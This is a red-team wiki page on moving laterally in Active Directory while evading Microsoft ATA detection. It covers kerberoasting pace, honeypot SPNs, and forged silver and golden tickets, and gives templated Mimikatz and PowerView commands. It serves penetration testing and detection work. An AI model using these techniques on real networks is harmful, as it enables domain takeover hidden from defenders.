The Red Team Vade Mecum
  • The Red Team Vade Mecum
  • Techniques
    • Defense Evasion
      • Binary Properties and Code Signing
      • ATA/ATP
        • Important Note
        • Intro
        • Lateral Movement
        • Domain Dominance
        • Identification
        • Recon
        • Blocking/Disabling Telemetry
          • Trusted Installer
      • Tips and Tricks
      • Basics
        • IOCs
          • High Level Overview of EDR technologies
        • Sandbox Evasion
        • Obfuscating Imports
          • Bootstrapping
        • Encrypting Strings
      • Disabling/Patching Telemetry
        • ETW Bypasses
        • AMSI Bypasses
      • Minimization
        • Commands to Avoid
        • Pivoting
        • Benefits of Using APIs
        • Thread-less Payload Execution
        • DLL Hollowing
      • Misdirection
        • Command Line Argument Spoofing
        • PPID Spoofing via CreateProcess
        • Switching Parents
          • Dechaining via WMI
      • Hiding our Payloads
        • Event Logs
        • File metadata
        • Registry Keys
        • ADS
      • IPC For Evasion and Control
    • Privilege Escalation
      • Hunting For Passwords
      • To System
        • New Service
        • Named Pipe Impersonation
        • Local Exploits
        • AlwaysInstallElevated
      • Hijacking Execution
        • Environment Variable interception
        • DLL Hijacking
      • Insecure Permissions
        • Missing Services and Tasks
        • Misconfigured Registry Hives
        • Insecure Binary Path
        • Unquoted Service Paths
    • Enumeration
      • Situational Awareness
      • Recon Commands
        • .NET AD Enum commands
        • WMIC commands
          • WMI queries from c++
    • Execution
      • Cool ways of Calling a Process
      • One Liners
    • Initial Access
      • Tips and Tricks
      • Tools
      • Staging/Stagers
      • MS Office
        • Macros
          • Evasion
            • VBA Stomping
            • Revert To Legacy Warning in Excel
            • Sandbox Evasion
          • Info Extraction
          • Inline Shapes
          • .MAM Files
          • PowerPoint
          • ACCDE
          • Shellcode Execution
          • Info Extraction
          • Dechaining Macros
        • Field Abuse
        • DDE
      • Payload Delivery
      • File Formats
        • MSG
        • RTF
        • REG
        • BAT
        • MSI Files
        • IQY
        • CHM
        • LNK
          • Using LNK to Automatically Download Payloads
        • HTA
    • Lateral Movement
      • Linux
        • SSH Hijacking
        • RDP
        • Impacket
      • No Admin?
      • Checking for access
      • Poison Handler
      • WinRM
      • AT
      • PsExec
      • WMI
      • Service Control
      • DCOM
      • RDP
      • SCShell
    • Code Injection
      • Hooking
        • Detours
      • CreateRemoteThread
      • DLL Injection
      • APC Queue Code Injection
      • Early Bird Injection
    • Persistence
      • Scheduled Tasks
        • AT
      • MS Office
      • SQL
      • Admin Level
        • SSP
        • Services
        • Default File Extension
        • AppCert DLLs
        • Time Provider
        • Waitfor
        • WinLogon
        • Netsh Dlls
        • RDP Backdoors
        • AppInit Dlls
        • Port Monitor
        • WMI Event Subscriptions
      • User Level
        • LNK
        • Startup Folder
        • Junction folders
        • Registry Keys
        • Logon Scripts
        • Powershell Profiles
        • Screen Savers
  • Infrastructure
    • SQL
      • MS SQL
        • Basics
        • Finding Sql Servers
        • Privilege Escalation
        • Post Exploitation
  • Other
    • Vulnerability Discovery
      • Web Vulnerabilities
        • Code Grepping
          • PHP Cheatsheet
    • Windows Internals
      • Unorganized Notes
Powered by GitBook
On this page
  • Over-Pass-The-Hash
  • SQL
  • Silver Tickets
  • Modification of Sensitive groups
  • Golden Tickets

Was this helpful?

  1. Techniques
  2. Defense Evasion
  3. ATA/ATP

Lateral Movement

PreviousIntroNextDomain Dominance

Last updated 3 years ago

Was this helpful?

Most lateral movement techniques like PSexec, PSRemoting, DCOM, and WMIexec are detected only if it's "abnormal traffic." If these technologies are used often by the user, like help desk commonly RDPing to workstations to help fix technical problems, then it will be safe to use that as it is considered "normal behavior."

But, there are other more stealthy ways to move laterally apart from using those technologies.

Over-Pass-The-Hash

Using only NTLM hashes to OPTH will be flagged by ATA as an encryption downgrade or unusual protocol implementation.

To generate kerberos tickets that will not be flagged, supply NTLM and AES keys and set the lifetime of the ticket to a normal value

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /aes128:<AES_KEY> /NTLM:<NTLM_HASH> /aes256:<AES_KEY> /endin:600 /renewmax:300 /ptt

Note that you can supply all zeroes for the aes128 key and it will not be flagged.

SQL

Moving laterally through SQL databases is not detected due to the fact that no traffic goes to the DC. All SQL authentication events are local to the server. We can find passwords and hashes of a privileged user, impersonate that user, and go on from there.

Silver Tickets

Using Kerberoasting and Silver Tickets are a good way to move laterally as Kerberoasting blends in with regular traffic and silver tickets have no communication with the DC whatsoever since its a forged TGS.

Make sure to slowly kerberoast users as kerberoasting all at once will cause spikes of traffic which may cause alerts.

We can slowly enumerate user objects with an SPN, by OU: 

 Get-DomainUser -SPN -SearchBase “ldap://OU=office,DC=...”

Then perform recon on groups that have access on various targets of interest:

Get-DomainGroup -MemberIdentity <user>

And then kerberoast that target if applicable: 

Get-DomainUser <user> | Get-DomainSPNTicket | fl *

Beware of Honeypot SPNs, factor in last logon, creation date etc. to identify these types of accounts

If we successfully crack the hash, we can then create a silver ticket

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /rc4:<AES_KEY> /endin:600 /renewmax:300 /service:<SERVICE> /target:<TARGET_COMPUTER> /ptt

Modification of Sensitive groups

If any of these sensitive groups are modified(like adding an account or changing passwords), These will be flagged for abnormal activity.

As a result, we can target other privileged groups like SQL admins or Help desk users.

Golden Tickets

The same logic applies to silver tickets to golden tickets as well, if we only supply the NTLM hash, it will be flagged as an encryption downgrade.

To subvert this, include all AES keys, note that if the length of the ticket is alive for more than 8 hours than its use, it is going to be flagged. So for extra stealthyness, create the ticket for like 20 minutes, use the ticket, and instantly destroy the ticket after:

kerberos::golden /user:JohnVanwagoner /domain:prod.local /sid:sid /aes256:aes256 /groups:512,513,519 /startoffset:-1 /endin:2500 /renewmax:3000 /ptt

MS SQLThe Red Team Vade Mecum
Logo